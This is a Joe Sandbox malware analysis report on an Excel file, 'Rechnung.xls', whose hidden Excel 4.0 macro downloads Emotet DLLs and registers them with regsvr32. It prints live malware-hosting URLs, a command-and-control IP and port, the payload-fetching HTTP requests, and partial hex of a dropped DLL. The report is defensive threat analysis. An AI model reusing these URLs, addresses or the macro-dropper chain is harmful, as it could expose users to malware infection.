Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Rechnung.xls

Overview

General Information

Sample Name:Rechnung.xls
Analysis ID:632078
MD5:9729363a5cdfee2598f93545b933043e
SHA1:be0c2937e23a7359a04366e9b27ccf1e3c32ee1f
SHA256:2b0db62c56ce0553d5ba8842a53d17ff5d0b66ad397c3b9565af1cfe48e19364
Tags:xls
Infos:

Detection

Hidden Macro 4.0, Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Office process drops PE file
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Downloads executable code via HTTP
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Drops PE files to the user directory
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2560 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 2632 cmdline: C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2440 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ITAzDMJQNXvQb\pSYwk.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2548 cmdline: C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1952 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\MTAKuNEHAAsvRsb\hgVDSaDXChbCzdU.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1252 cmdline: C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2208 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GistaKepWrpVA\oAaDhgd.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1216 cmdline: C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.1240649290.00000000001D0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000005.00000002.943959485.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000007.00000002.953530856.00000000003D0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000004.00000002.1241261455.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000006.00000002.1240847022.0000000001FE0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 7 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            8.2.regsvr32.exe.1d0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              7.2.regsvr32.exe.3d0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                7.2.regsvr32.exe.3d0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  6.2.regsvr32.exe.1fe0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    5.2.regsvr32.exe.2f0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      Click to see the 7 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      No Snort rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Multi AV Scanner detection for submitted file
                      Source: Rechnung.xlsVirustotal: Detection: 42%Perma Link
                      Source: Rechnung.xlsReversingLabs: Detection: 34%
                      Antivirus detection for URL or domain
                      Source: https://173.82.82.196:8080/URL Reputation: Label: malware
                      Source: https://173.82.82.196/C01-Avira URL Cloud: Label: malware
                      Source: http://salledemode.com/tgroup.ge/x4bc2kL4BzGAeUsVi/Avira URL Cloud: Label: malware
                      Source: https://173.82.82.196/URL Reputation: Label: malware
                      Source: https://vipteck.com/wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/Avira URL Cloud: Label: malware
                      Source: http://www.kabeonet.pl/wp-admin/VWlAz5vWJNHDb/Avira URL Cloud: Label: malware
                      Source: http://vipteck.com/wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/Avira URL Cloud: Label: malware
                      Source: http://kabeonet.pl/wp-admin/VWlAz5vWJNHDb/Avira URL Cloud: Label: malware
                      Source: https://173.82.82.196:8080/HAvira URL Cloud: Label: malware
                      Source: https://173.82.82.196:8080/LAvira URL Cloud: Label: malware
                      Source: https://173.82.82.196/lAvira URL Cloud: Label: malware
                      Multi AV Scanner detection for domain / URL
                      Source: salledemode.comVirustotal: Detection: 11%Perma Link
                      Source: vipteck.comVirustotal: Detection: 9%Perma Link
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\klJrMZJhgldiJr6j0XWPeZOiGs[1].dllReversingLabs: Detection: 56%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RD05UTHGkitvIJt[1].dllReversingLabs: Detection: 41%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dllMetadefender: Detection: 28%Perma Link
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dllReversingLabs: Detection: 58%
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dllJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\klJrMZJhgldiJr6j0XWPeZOiGs[1].dllJoe Sandbox ML: detected
                      Source: C:\Users\user\uxevr3.ocxJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RD05UTHGkitvIJt[1].dllJoe Sandbox ML: detected
                      Source: C:\Users\user\uxevr1.ocxJoe Sandbox ML: detected
                      Source: C:\Users\user\uxevr2.ocxJoe Sandbox ML: detected
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: unknownHTTPS traffic detected: 188.114.97.10:443 -> 192.168.2.22:49172 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 159.203.19.2:443 -> 192.168.2.22:49174 version: TLS 1.2
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,4_2_00000001800248B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,6_2_00000001800248B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,8_2_00000001800248B0

                      Software Vulnerabilities

                      barindex
                      Document exploit detected (drops PE files)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: RD05UTHGkitvIJt[1].dll.0.drJump to dropped file
                      Document exploit detected (creates forbidden files)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RD05UTHGkitvIJt[1].dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\klJrMZJhgldiJr6j0XWPeZOiGs[1].dllJump to behavior
                      Document exploit detected (process start blacklist hit)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
                      Document exploit detected (UrlDownloadToFile)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
                      Source: global trafficDNS query: name: vipteck.com
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.97.10:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.10:443

                      Networking

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 173.82.82.196 8080Jump to behavior
                      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                      Source: Joe Sandbox ViewIP Address: 188.114.97.10 188.114.97.10
                      Source: Joe Sandbox ViewIP Address: 188.114.97.10 188.114.97.10
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 23 May 2022 07:19:19 GMTServer: ApacheX-Powered-By: PHP/7.2.34Cache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Mon, 23 May 2022 07:19:19 GMTContent-Disposition: attachment; filename="me435CErJsFGw1q.dll"Content-Transfer-Encoding: binarySet-Cookie: 628b3577889f1=1653290359; expires=Mon, 23-May-2022 07:20:19 GMT; Max-Age=60; path=/Upgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Mon, 23 May 2022 07:19:19 GMTContent-Length: 365056Vary: Accept-EncodingStrict-Transport-Security: max-age=300Keep-Alive: timeout=5Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 76 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 8a 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 05 00 00 04 00 00 f5 54 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 d0 aa 02 00 84 00 00 00 04 a2 02 00 50 00 00 00 00 00 03 00 fc d1 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 54 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc d1 02 00 00 00 03 00 00 d2 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8ikikikkikkikkikhkikkikkikkikkikRichikPEdv{b
                      Source: global trafficHTTP traffic detected: GET /wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: vipteck.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-admin/iMc/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: airliftlimo.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: vipteck.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /tgroup.ge/x4bc2kL4BzGAeUsVi/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: salledemode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-admin/VWlAz5vWJNHDb/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kabeonet.plConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-admin/VWlAz5vWJNHDb/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.kabeonet.plConnection: Keep-Alive
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 173.82.82.196:8080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 23 May 2022 07:19:31 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.kabeonet.pl/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, Keep-AliveKeep-Alive: timeout=2, max=100Transfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 31 66 30 30 0d 0a 09 09 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 37 22 20 6c 61 6e 67 3d 22 70 6c 2d 50 4c 22 3e 0d 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 38 22 20 6c 61 6e 67 3d 22 70 6c 2d 50 4c 22 3e 0d 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 26 20 21 28 49 45 20 38 29 5d 3e 3c 21 2d 2d 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 2d 50 4c 22 3e 0d 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 0d 0a 09 09 0d 0a 09 09 09 4e 69 65 20 7a 6e 61 6c 65 7a 69 6f 6e 6f 20 73 74 72 6f 6e 79 50 72 6f 6a 65 6b 74 6f 77 61 6e 69 65 20 73 74 72 6f 6e 20 69 6e 74 65 72 6e 65 74 6f 77 79 63 68 20 4f 70 6f 6c 65 09 09 0d 0a 09 09 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 31 30 30 2c 33 30 30 26 73 75 62 73 65 74 3d 6c 61 74 69 6e 2c 6c 61 74 69 6e 2d 65 78 74 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 09 09 0d 0a 20 20 20 20 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 38 2e 39 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 6c 5f 50 4c 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 74 72 6f 6e 79 20 6
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1240826221.00000000003DA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: regsvr32.exe, 00000004.00000002.1240790181.000000000040A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.1001580079.000000000040A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1240766444.00000000002D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: regsvr32.exe, 00000006.00000002.1240795899.00000000003BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme
                      Source: regsvr32.exe, 00000006.00000002.1240812626.00000000003CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enL
                      Source: regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
